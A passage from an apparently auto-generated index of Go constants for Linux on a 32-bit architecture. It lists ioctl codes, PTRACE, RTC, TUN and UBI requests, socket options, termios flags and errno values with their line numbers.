PPPIOCSMAXCID = 0x40047451 constant PPPIOCSMRRU (line 221) | PPPIOCSMRRU = 0x4004743b constant PPPIOCSMRU (line 222) | PPPIOCSMRU = 0x40047452 constant PPPIOCSNPMODE (line 223) | PPPIOCSNPMODE = 0x4008744b constant PPPIOCSPASS (line 224) | PPPIOCSPASS = 0x40087447 constant PPPIOCSRASYNCMAP (line 225) | PPPIOCSRASYNCMAP = 0x40047454 constant PPPIOCSXASYNCMAP (line 226) | PPPIOCSXASYNCMAP = 0x4020744f constant PPPIOCUNBRIDGECHAN (line 227) | PPPIOCUNBRIDGECHAN = 0x7434 constant PPPIOCXFERUNIT (line 228) | PPPIOCXFERUNIT = 0x744e constant PR_SET_PTRACER_ANY (line 229) | PR_SET_PTRACER_ANY = 0xffffffff constant PTRACE_GETCRUNCHREGS (line 230) | PTRACE_GETCRUNCHREGS = 0x19 constant PTRACE_GETFDPIC (line 231) | PTRACE_GETFDPIC = 0x1f constant PTRACE_GETFDPIC_EXEC (line 232) | PTRACE_GETFDPIC_EXEC = 0x0 constant PTRACE_GETFDPIC_INTERP (line 233) | PTRACE_GETFDPIC_INTERP = 0x1 constant PTRACE_GETFPREGS (line 234) | PTRACE_GETFPREGS = 0xe constant PTRACE_GETHBPREGS (line 235) | PTRACE_GETHBPREGS = 0x1d constant PTRACE_GETVFPREGS (line 236) | PTRACE_GETVFPREGS = 0x1b constant PTRACE_GETWMMXREGS (line 237) | PTRACE_GETWMMXREGS = 0x12 constant PTRACE_GET_THREAD_AREA (line 238) | PTRACE_GET_THREAD_AREA = 0x16 constant PTRACE_OLDSETOPTIONS (line 239) | PTRACE_OLDSETOPTIONS = 0x15 constant PTRACE_SETCRUNCHREGS (line 240) | PTRACE_SETCRUNCHREGS = 0x1a constant PTRACE_SETFPREGS (line 241) | PTRACE_SETFPREGS = 0xf constant PTRACE_SETHBPREGS (line 242) | PTRACE_SETHBPREGS = 0x1e constant PTRACE_SETVFPREGS (line 243) | PTRACE_SETVFPREGS = 0x1c constant PTRACE_SETWMMXREGS (line 244) | PTRACE_SETWMMXREGS = 0x13 constant PTRACE_SET_SYSCALL (line 245) | PTRACE_SET_SYSCALL = 0x17 constant PT_DATA_ADDR (line 246) | PT_DATA_ADDR = 0x10004 constant PT_TEXT_ADDR (line 247) | PT_TEXT_ADDR = 0x10000 constant PT_TEXT_END_ADDR (line 248) | PT_TEXT_END_ADDR = 0x10008 constant RLIMIT_AS (line 249) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 250) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 251) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 252) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 253) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 254) | RNDADDENTROPY = 0x40085203 constant RNDADDTOENTCNT (line 255) | RNDADDTOENTCNT = 0x40045201 constant RNDCLEARPOOL (line 256) | RNDCLEARPOOL = 0x5206 constant RNDGETENTCNT (line 257) | RNDGETENTCNT = 0x80045200 constant RNDGETPOOL (line 258) | RNDGETPOOL = 0x80085202 constant RNDRESEEDCRNG (line 259) | RNDRESEEDCRNG = 0x5207 constant RNDZAPENTCNT (line 260) | RNDZAPENTCNT = 0x5204 constant RTC_AIE_OFF (line 261) | RTC_AIE_OFF = 0x7002 constant RTC_AIE_ON (line 262) | RTC_AIE_ON = 0x7001 constant RTC_ALM_READ (line 263) | RTC_ALM_READ = 0x80247008 constant RTC_ALM_SET (line 264) | RTC_ALM_SET = 0x40247007 constant RTC_EPOCH_READ (line 265) | RTC_EPOCH_READ = 0x8004700d constant RTC_EPOCH_SET (line 266) | RTC_EPOCH_SET = 0x4004700e constant RTC_IRQP_READ (line 267) | RTC_IRQP_READ = 0x8004700b constant RTC_IRQP_SET (line 268) | RTC_IRQP_SET = 0x4004700c constant RTC_PARAM_GET (line 269) | RTC_PARAM_GET = 0x40187013 constant RTC_PARAM_SET (line 270) | RTC_PARAM_SET = 0x40187014 constant RTC_PIE_OFF (line 271) | RTC_PIE_OFF = 0x7006 constant RTC_PIE_ON (line 272) | RTC_PIE_ON = 0x7005 constant RTC_PLL_GET (line 273) | RTC_PLL_GET = 0x801c7011 constant RTC_PLL_SET (line 274) | RTC_PLL_SET = 0x401c7012 constant RTC_RD_TIME (line 275) | RTC_RD_TIME = 0x80247009 constant RTC_SET_TIME (line 276) | RTC_SET_TIME = 0x4024700a constant RTC_UIE_OFF (line 277) | RTC_UIE_OFF = 0x7004 constant RTC_UIE_ON (line 278) | RTC_UIE_ON = 0x7003 constant RTC_VL_CLR (line 279) | RTC_VL_CLR = 0x7014 constant RTC_VL_READ (line 280) | RTC_VL_READ = 0x80047013 constant RTC_WIE_OFF (line 281) | RTC_WIE_OFF = 0x7010 constant RTC_WIE_ON (line 282) | RTC_WIE_ON = 0x700f constant RTC_WKALM_RD (line 283) | RTC_WKALM_RD = 0x80287010 constant RTC_WKALM_SET (line 284) | RTC_WKALM_SET = 0x4028700f constant SCM_TIMESTAMPING (line 285) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 286) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 287) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 288) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 289) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 290) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 291) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x40182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 292) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x40082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 293) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x40082104 constant SFD_CLOEXEC (line 294) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 295) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 296) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 297) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 298) | SIOCGSTAMPNS_NEW = 0x80108907 constant SIOCGSTAMP_NEW (line 299) | SIOCGSTAMP_NEW = 0x80108906 constant SIOCINQ (line 300) | SIOCINQ = 0x541b constant SIOCOUTQ (line 301) | SIOCOUTQ = 0x5411 constant SIOCSPGRP (line 302) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 303) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 304) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 305) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 306) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 307) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 308) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 309) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 310) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 311) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 312) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 313) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 314) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 315) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 316) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 317) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 318) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 319) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 320) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 321) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 322) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 323) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 324) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 325) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 326) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 327) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 328) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 329) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 330) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 331) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 332) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 333) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 334) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 335) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 336) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 337) | SO_PASSCRED = 0x10 constant SO_PASSPIDFD (line 338) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 339) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 340) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 341) | SO_PEERCRED = 0x11 constant SO_PEERGROUPS (line 342) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 343) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 344) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 345) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 346) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 347) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 348) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 349) | SO_RCVLOWAT = 0x12 constant SO_RCVMARK (line 350) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 351) | SO_RCVTIMEO = 0x14 constant SO_RCVTIMEO_NEW (line 352) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 353) | SO_RCVTIMEO_OLD = 0x14 constant SO_RESERVE_MEM (line 354) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 355) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 356) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 357) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 358) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 359) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 360) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 361) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 362) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 363) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 364) | SO_SNDLOWAT = 0x13 constant SO_SNDTIMEO (line 365) | SO_SNDTIMEO = 0x15 constant SO_SNDTIMEO_NEW (line 366) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 367) | SO_SNDTIMEO_OLD = 0x15 constant SO_TIMESTAMPING (line 368) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 369) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 370) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 371) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 372) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 373) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 374) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 375) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 376) | SO_TXTIME = 0x3d constant SO_TYPE (line 377) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 378) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 379) | SO_ZEROCOPY = 0x3c constant TAB1 (line 380) | TAB1 = 0x800 constant TAB2 (line 381) | TAB2 = 0x1000 constant TAB3 (line 382) | TAB3 = 0x1800 constant TABDLY (line 383) | TABDLY = 0x1800 constant TCFLSH (line 384) | TCFLSH = 0x540b constant TCGETA (line 385) | TCGETA = 0x5405 constant TCGETS (line 386) | TCGETS = 0x5401 constant TCGETS2 (line 387) | TCGETS2 = 0x802c542a constant TCGETX (line 388) | TCGETX = 0x5432 constant TCSAFLUSH (line 389) | TCSAFLUSH = 0x2 constant TCSBRK (line 390) | TCSBRK = 0x5409 constant TCSBRKP (line 391) | TCSBRKP = 0x5425 constant TCSETA (line 392) | TCSETA = 0x5406 constant TCSETAF (line 393) | TCSETAF = 0x5408 constant TCSETAW (line 394) | TCSETAW = 0x5407 constant TCSETS (line 395) | TCSETS = 0x5402 constant TCSETS2 (line 396) | TCSETS2 = 0x402c542b constant TCSETSF (line 397) | TCSETSF = 0x5404 constant TCSETSF2 (line 398) | TCSETSF2 = 0x402c542d constant TCSETSW (line 399) | TCSETSW = 0x5403 constant TCSETSW2 (line 400) | TCSETSW2 = 0x402c542c constant TCSETX (line 401) | TCSETX = 0x5433 constant TCSETXF (line 402) | TCSETXF = 0x5434 constant TCSETXW (line 403) | TCSETXW = 0x5435 constant TCXONC (line 404) | TCXONC = 0x540a constant TFD_CLOEXEC (line 405) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 406) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 407) | TIOCCBRK = 0x5428 constant TIOCCONS (line 408) | TIOCCONS = 0x541d constant TIOCEXCL (line 409) | TIOCEXCL = 0x540c constant TIOCGDEV (line 410) | TIOCGDEV = 0x80045432 constant TIOCGETD (line 411) | TIOCGETD = 0x5424 constant TIOCGEXCL (line 412) | TIOCGEXCL = 0x80045440 constant TIOCGICOUNT (line 413) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 414) | TIOCGISO7816 = 0x80285442 constant TIOCGLCKTRMIOS (line 415) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGPGRP (line 416) | TIOCGPGRP = 0x540f constant TIOCGPKT (line 417) | TIOCGPKT = 0x80045438 constant TIOCGPTLCK (line 418) | TIOCGPTLCK = 0x80045439 constant TIOCGPTN (line 419) | TIOCGPTN = 0x80045430 constant TIOCGPTPEER (line 420) | TIOCGPTPEER = 0x5441 constant TIOCGRS485 (line 421) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 422) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 423) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 424) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 425) | TIOCGWINSZ = 0x5413 constant TIOCINQ (line 426) | TIOCINQ = 0x541b constant TIOCLINUX (line 427) | TIOCLINUX = 0x541c constant TIOCMBIC (line 428) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 429) | TIOCMBIS = 0x5416 constant TIOCMGET (line 430) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 431) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 432) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 433) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 434) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 435) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 436) | TIOCM_DSR = 0x100 constant TIOCM_RI (line 437) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 438) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 439) | TIOCM_SR = 0x10 constant TIOCM_ST (line 440) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 441) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 442) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 443) | TIOCOUTQ = 0x5411 constant TIOCPKT (line 444) | TIOCPKT = 0x5420 constant TIOCSBRK (line 445) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 446) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 447) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 448) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 449) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 450) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 451) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 452) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 453) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 454) | TIOCSER_TEMT = 0x1 constant TIOCSETD (line 455) | TIOCSETD = 0x5423 constant TIOCSIG (line 456) | TIOCSIG = 0x40045436 constant TIOCSISO7816 (line 457) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 458) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSPGRP (line 459) | TIOCSPGRP = 0x5410 constant TIOCSPTLCK (line 460) | TIOCSPTLCK = 0x40045431 constant TIOCSRS485 (line 461) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 462) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 463) | TIOCSSOFTCAR = 0x541a constant TIOCSTI (line 464) | TIOCSTI = 0x5412 constant TIOCSWINSZ (line 465) | TIOCSWINSZ = 0x5414 constant TIOCVHANGUP (line 466) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 467) | TOSTOP = 0x100 constant TUNATTACHFILTER (line 468) | TUNATTACHFILTER = 0x400854d5 constant TUNDETACHFILTER (line 469) | TUNDETACHFILTER = 0x400854d6 constant TUNGETDEVNETNS (line 470) | TUNGETDEVNETNS = 0x54e3 constant TUNGETFEATURES (line 471) | TUNGETFEATURES = 0x800454cf constant TUNGETFILTER (line 472) | TUNGETFILTER = 0x800854db constant TUNGETIFF (line 473) | TUNGETIFF = 0x800454d2 constant TUNGETSNDBUF (line 474) | TUNGETSNDBUF = 0x800454d3 constant TUNGETVNETBE (line 475) | TUNGETVNETBE = 0x800454df constant TUNGETVNETHDRSZ (line 476) | TUNGETVNETHDRSZ = 0x800454d7 constant TUNGETVNETLE (line 477) | TUNGETVNETLE = 0x800454dd constant TUNSETCARRIER (line 478) | TUNSETCARRIER = 0x400454e2 constant TUNSETDEBUG (line 479) | TUNSETDEBUG = 0x400454c9 constant TUNSETFILTEREBPF (line 480) | TUNSETFILTEREBPF = 0x800454e1 constant TUNSETGROUP (line 481) | TUNSETGROUP = 0x400454ce constant TUNSETIFF (line 482) | TUNSETIFF = 0x400454ca constant TUNSETIFINDEX (line 483) | TUNSETIFINDEX = 0x400454da constant TUNSETLINK (line 484) | TUNSETLINK = 0x400454cd constant TUNSETNOCSUM (line 485) | TUNSETNOCSUM = 0x400454c8 constant TUNSETOFFLOAD (line 486) | TUNSETOFFLOAD = 0x400454d0 constant TUNSETOWNER (line 487) | TUNSETOWNER = 0x400454cc constant TUNSETPERSIST (line 488) | TUNSETPERSIST = 0x400454cb constant TUNSETQUEUE (line 489) | TUNSETQUEUE = 0x400454d9 constant TUNSETSNDBUF (line 490) | TUNSETSNDBUF = 0x400454d4 constant TUNSETSTEERINGEBPF (line 491) | TUNSETSTEERINGEBPF = 0x800454e0 constant TUNSETTXFILTER (line 492) | TUNSETTXFILTER = 0x400454d1 constant TUNSETVNETBE (line 493) | TUNSETVNETBE = 0x400454de constant TUNSETVNETHDRSZ (line 494) | TUNSETVNETHDRSZ = 0x400454d8 constant TUNSETVNETLE (line 495) | TUNSETVNETLE = 0x400454dc constant UBI_IOCATT (line 496) | UBI_IOCATT = 0x40186f40 constant UBI_IOCDET (line 497) | UBI_IOCDET = 0x40046f41 constant UBI_IOCEBCH (line 498) | UBI_IOCEBCH = 0x40044f02 constant UBI_IOCEBER (line 499) | UBI_IOCEBER = 0x40044f01 constant UBI_IOCEBISMAP (line 500) | UBI_IOCEBISMAP = 0x80044f05 constant UBI_IOCEBMAP (line 501) | UBI_IOCEBMAP = 0x40084f03 constant UBI_IOCEBUNMAP (line 502) | UBI_IOCEBUNMAP = 0x40044f04 constant UBI_IOCMKVOL (line 503) | UBI_IOCMKVOL = 0x40986f00 constant UBI_IOCRMVOL (line 504) | UBI_IOCRMVOL = 0x40046f01 constant UBI_IOCRNVOL (line 505) | UBI_IOCRNVOL = 0x51106f03 constant UBI_IOCRPEB (line 506) | UBI_IOCRPEB = 0x40046f04 constant UBI_IOCRSVOL (line 507) | UBI_IOCRSVOL = 0x400c6f02 constant UBI_IOCSETVOLPROP (line 508) | UBI_IOCSETVOLPROP = 0x40104f06 constant UBI_IOCSPEB (line 509) | UBI_IOCSPEB = 0x40046f05 constant UBI_IOCVOLCRBLK (line 510) | UBI_IOCVOLCRBLK = 0x40804f07 constant UBI_IOCVOLRMBLK (line 511) | UBI_IOCVOLRMBLK = 0x4f08 constant UBI_IOCVOLUP (line 512) | UBI_IOCVOLUP = 0x40084f00 constant VDISCARD (line 513) | VDISCARD = 0xd constant VEOF (line 514) | VEOF = 0x4 constant VEOL (line 515) | VEOL = 0xb constant VEOL2 (line 516) | VEOL2 = 0x10 constant VMIN (line 517) | VMIN = 0x6 constant VREPRINT (line 518) | VREPRINT = 0xc constant VSTART (line 519) | VSTART = 0x8 constant VSTOP (line 520) | VSTOP = 0x9 constant VSUSP (line 521) | VSUSP = 0xa constant VSWTC (line 522) | VSWTC = 0x7 constant VT1 (line 523) | VT1 = 0x4000 constant VTDLY (line 524) | VTDLY = 0x4000 constant VTIME (line 525) | VTIME = 0x5 constant VWERASE (line 526) | VWERASE = 0xe constant WDIOC_GETBOOTSTATUS (line 527) | WDIOC_GETBOOTSTATUS = 0x80045702 constant WDIOC_GETPRETIMEOUT (line 528) | WDIOC_GETPRETIMEOUT = 0x80045709 constant WDIOC_GETSTATUS (line 529) | WDIOC_GETSTATUS = 0x80045701 constant WDIOC_GETSUPPORT (line 530) | WDIOC_GETSUPPORT = 0x80285700 constant WDIOC_GETTEMP (line 531) | WDIOC_GETTEMP = 0x80045703 constant WDIOC_GETTIMELEFT (line 532) | WDIOC_GETTIMELEFT = 0x8004570a constant WDIOC_GETTIMEOUT (line 533) | WDIOC_GETTIMEOUT = 0x80045707 constant WDIOC_KEEPALIVE (line 534) | WDIOC_KEEPALIVE = 0x80045705 constant WDIOC_SETOPTIONS (line 535) | WDIOC_SETOPTIONS = 0x80045704 constant WORDSIZE (line 536) | WORDSIZE = 0x20 constant XCASE (line 537) | XCASE = 0x4 constant XTABS (line 538) | XTABS = 0x1800 constant _HIDIOCGRAWNAME (line 539) | _HIDIOCGRAWNAME = 0x80804804 constant _HIDIOCGRAWPHYS (line 540) | _HIDIOCGRAWPHYS = 0x80404805 constant _HIDIOCGRAWUNIQ (line 541) | _HIDIOCGRAWUNIQ = 0x80404808 constant EADDRINUSE (line 546) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 547) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 548) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 549) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 550) | EALREADY = syscall.Errno(0x72) constant EBADE (line 551) | EBADE = syscall.Errno(0x34) constant EBADFD (line 552) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 553) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 554) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 555) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 556) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 557) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 558) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 559) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 560) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 561) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 562) | ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 563) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 564) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 565) | EDEADLOCK = syscall.Errno(0x23) constant EDESTADDRREQ (line 566) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 567) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 568) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 569) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 570) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 571) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 572) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 573) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 574) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 575) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 576) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 577) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 578) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 579) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 580) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 581) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 582) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 583) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 584) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 585) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 586) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 587) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 588) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 589) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 590) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 591) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 592) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 593) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 594) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 595) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 596) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 597) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 598) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 599) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 600) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 601) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 602) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 603) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 604) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 605) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 606) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 607) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 608) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 609) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 610) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 611) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 612) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 613) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 614) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 615) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 616) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 617) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 618) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 619) | ENOTSUP = syscall.Errno(0x5f) constant ENOTUNIQ (line 620) | ENOTUNIQ = syscall.Errno(0x4c) constant EOPNOTSUPP (line 621) | EOPNOTSUPP = syscall.Errno(0x5f) constant EOVERFLOW (line 622) | EOVERFLOW = syscall.Errno(0x4b) constant EOWNERDEAD (line 623) | EOWNERDEAD = syscall.Errno(0x82) constant EPFNOSUPPORT (line 624) | EPFNOSUPPORT = syscall.Errno(0x60) constant EPROTO (line 625) | EPROTO = syscall.Errno(0x47) constant EPROTONOSUPPORT (line 626) | EPROTONOSUPPORT = syscall.Errno(0x5d) constant EPROTOTYPE (line 627) | EPROTOTYPE = syscall.Errno(0x5b) constant EREMCHG (line 628) | EREMCHG = syscall.Errno(0x4e) constant EREMOTE (line 629) | EREMOTE = syscall.Errno(0x42) constant EREMOTEIO (line 630) | EREMOTEIO = syscall.Errno(0x79) constant ERESTART (line 631) | ERESTART = syscall.Errno(0x55) constant ERFKILL (line 632) | ERFKILL = syscall.Errno(0x84) constant ESHUTDOWN (line 633) | ESHUTDOWN = syscall.Errno(0x6c) constant ESOCKTNOSUPPORT (line 634) | ESOCKTNOSUPPORT = syscall.Errno(0x5e) constant ESRMNT (line 635) | ESRMNT = syscall.Errno(0x45) constant ESTALE (line 636) | ESTALE = 